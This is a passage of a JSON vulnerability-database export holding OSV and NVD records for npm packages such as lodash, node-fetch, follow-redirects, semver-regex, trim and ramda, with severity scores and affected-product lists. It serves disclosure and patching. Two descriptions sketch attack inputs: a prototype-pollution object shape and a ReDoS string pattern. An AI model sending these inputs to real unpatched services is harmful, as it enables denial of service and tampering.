{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-12T01:05:36", "description": "Versions of `lodash` before 4.17.12 are vulnerable to Prototype Pollution. The function `defaultsDeep` allows a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.12 or later.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2019-07-10T19:45:23", "type": "osv", "title": "Prototype Pollution in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2021-08-17T17:55:46", "id": "OSV:GHSA-JF85-CPCP-J695", "href": "https://osv.dev/vulnerability/GHSA-jf85-cpcp-j695", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-05-11T21:07:41", "description": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The function zipObjectDeep allows a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires zipping objects based on user-provided property arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-07-15T19:15:48", "type": "osv", "title": "Prototype Pollution in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2022-02-08T22:04:28", "id": "OSV:GHSA-P6MC-M468-83GW", "href": "https://osv.dev/vulnerability/GHSA-p6mc-m468-83gw", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-05-11T20:35:41", "description": "All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-10T18:44:22", "type": "osv", "title": "Regular Expression Denial of Service in trim", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2022-04-27T19:19:28", "id": "OSV:GHSA-W5P7-H5W8-2HFQ", "href": "https://osv.dev/vulnerability/GHSA-w5p7-h5w8-2hfq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-11T21:07:42", "description": "`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T16:05:51", "type": "osv", "title": "Command Injection in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2022-02-08T21:35:09", "id": "OSV:GHSA-35JH-R3H4-6JHM", "href": "https://osv.dev/vulnerability/GHSA-35jh-r3h4-6jhm", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T14:03:35", "description": "npm `semver-regex` is vulnerable to Inefficient Regular Expression Complexity", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-20T20:42:25", "type": "osv", "title": "Regular Expression Denial of Service (ReDOS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2022-05-26T19:56:35", "id": "OSV:GHSA-44C6-4V22-4MHX", "href": "https://osv.dev/vulnerability/GHSA-44c6-4v22-4mhx", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-11T21:07:20", "description": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:31", "type": "osv", "title": "Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-02-14T22:27:56", "id": "OSV:GHSA-PW2R-VQ6V-HR8C", "href": "https://osv.dev/vulnerability/GHSA-pw2r-vq6v-hr8c", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T17:56:34", "description": "[node-fetch](https://www.npmjs.com/package/node-fetch) is a light-weight module that brings window.fetch to node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the `isOriginPotentiallyTrustworthy()` function in `referrer.js`, when processing a URL string with alternating letters and periods, such as `'http://' + 'a.a.'.repeat(i) + 'a'`.", "cvss3": {}, "published": "2022-08-02T00:00:25", "type": "osv", "title": "node-fetch Inefficient Regular Expression Complexity ", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-04T17:37:24", "id": "OSV:GHSA-VP56-6G26-6827", "href": "https://osv.dev/vulnerability/GHSA-vp56-6g26-6827", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-11T21:08:49", "description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2022-01-21T23:55:52", "type": "osv", "title": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-01-18T22:51:22", "id": "OSV:GHSA-R683-J2X4-V87G", "href": "https://osv.dev/vulnerability/GHSA-r683-j2x4-v87g", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-12-05T04:34:28", "description": "\nranjit-git discovered an information leak vulnerability in node-fetch, a\nNode.js module exposing a window.fetch compatible API on Node.js\nruntime: the module was not honoring the same-origin-policy and upon\nfollowing a redirect would leak cookies to the the target URL.\n\n\nFor Debian 10 buster, this problem has been fixed in version\n1.7.3-1+deb10u1.\n\n\nWe recommend that you upgrade your node-fetch packages.\n\n\nFor the detailed security status of node-fetch please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/node-fetch>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-12-05T00:00:00", "type": "osv", "title": "node-fetch - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-12-05T04:34:28", "id": "OSV:DLA-3222-1", "href": "https://osv.dev/vulnerability/DLA-3222-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-11T21:08:42", "description": "follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-01-12T22:46:26", "type": "osv", "title": "Exposure of sensitive information in follow-redirects", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-01-20T15:34:48", "id": "OSV:GHSA-74FJ-2J2H-C42Q", "href": "https://osv.dev/vulnerability/GHSA-74fj-2j2h-c42q", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-02-09T14:34:23", "description": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test() method", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-02T14:15:00", "type": "cve", "title": "CVE-2021-43307", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43307"], "modified": "2022-06-09T18:39:00", "cpe": [], "id": "CVE-2021-43307", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43307", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-02-10T16:01:08", "description": "** DISPUTED ** Prototype poisoning in function mapObjIndexed in Ramda 0.27.0 and earlier allows attackers to compromise integrity or availability of application via supplying a crafted object (that contains an own property \"__proto__\") as an argument to the function. NOTE: the vendor disputes this because the observed behavior only means that a user can create objects that the user didn't know would contain custom prototypes.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-10T11:15:00", "type": "cve", "title": "CVE-2021-42581", "cwe": ["CWE-1321"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42581"], "modified": "2023-02-10T02:42:00", "cpe": ["cpe:/a:ramdajs:ramda:0.27.0"], "id": "CVE-2021-42581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42581", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ramdajs:ramda:0.27.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:06:04", "description": "node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T19:15:00", "type": "cve", "title": "CVE-2020-15168", "cwe": ["CWE-770"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-09-17T20:21:00", "cpe": ["cpe:/a:node-fetch_project:node-fetch:3.0.0"], "id": "CVE-2020-15168", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15168", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:node-fetch_project:node-fetch:3.0.0:beta5:*:*:*:node.js:*:*", "cpe:2.3:a:node-fetch_project:node-fetch:3.0.0:beta8:*:*:*:node.js:*:*", "cpe:2.3:a:node-fetch_project:node-fetch:3.0.0:beta7:*:*:*:node.js:*:*", "cpe:2.3:a:node-fetch_project:node-fetch:3.0.0:beta6:*:*:*:node.js:*:*", "cpe:2.3:a:node-fetch_project:node-fetch:3.0.0:beta1:*:*:*:node.js:*:*"]}, {"lastseen": "2023-02-09T15:18:34", "description": "Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-15T11:15:00", "type": "cve", "title": "CVE-2020-28500", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2022-09-13T21:18:00", "cpe": ["cpe:/a:oracle:banking_extensibility_workbench:14.2.0", "cpe:/a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0", "cpe:/a:oracle:banking_extensibility_workbench:14.5.0", "cpe:/a:oracle:primavera_unifier:18.8", "cpe:/a:oracle:primavera_unifier:20.12", "cpe:/a:oracle:primavera_unifier:19.12", "cpe:/a:oracle:health_sciences_data_management_workbench:3.0.0.0", "cpe:/a:oracle:primavera_unifier:17.12", "cpe:/a:oracle:health_sciences_data_management_workbench:2.5.2.1", "cpe:/a:oracle:communications_session_border_controller:9.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.5.0", "cpe:/a:oracle:primavera_gateway:18.8.12", "cpe:/a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58", "cpe:/a:oracle:banking_supply_chain_finance:14.3.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.2.0", "cpe:/a:oracle:banking_credit_facilities_process_management:14.3.0", "cpe:/a:oracle:primavera_gateway:17.12.11", "cpe:/a:oracle:banking_credit_facilities_process_management:14.2.0", "cpe:/a:oracle:enterprise_communications_broker:3.2.0", "cpe:/a:siemens:sinec_ins:1.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.2.0", "cpe:/a:oracle:communications_services_gatekeeper:7.0", "cpe:/a:oracle:banking_supply_chain_finance:14.5.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.3.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.59", "cpe:/a:oracle:communications_cloud_native_core_policy:1.11.0", "cpe:/a:oracle:communications_session_border_controller:8.4", "cpe:/a:oracle:banking_credit_facilities_process_management:14.5.0", "cpe:/a:oracle:primavera_gateway:19.12.11", "cpe:/a:oracle:communications_design_studio:7.4.2", "cpe:/a:oracle:banking_corporate_lending_process_management:14.3.0", "cpe:/a:oracle:primavera_gateway:20.12.7", "cpe:/a:oracle:banking_supply_chain_finance:14.2.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.5.0", "cpe:/a:oracle:banking_extensibility_workbench:14.3.0", "cpe:/a:oracle:enterprise_communications_broker:3.3.0", "cpe:/a:oracle:retail_customer_management_and_segmentation_foundation:19.0"], "id": "CVE-2020-28500", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28500", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:primavera_unifier:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_data_management_workbench:2.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:19.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_design_studio:7.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:-:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:20.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:20.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:26:15", "description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-07-26T00:15:00", "type": "cve", "title": "CVE-2019-10744", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 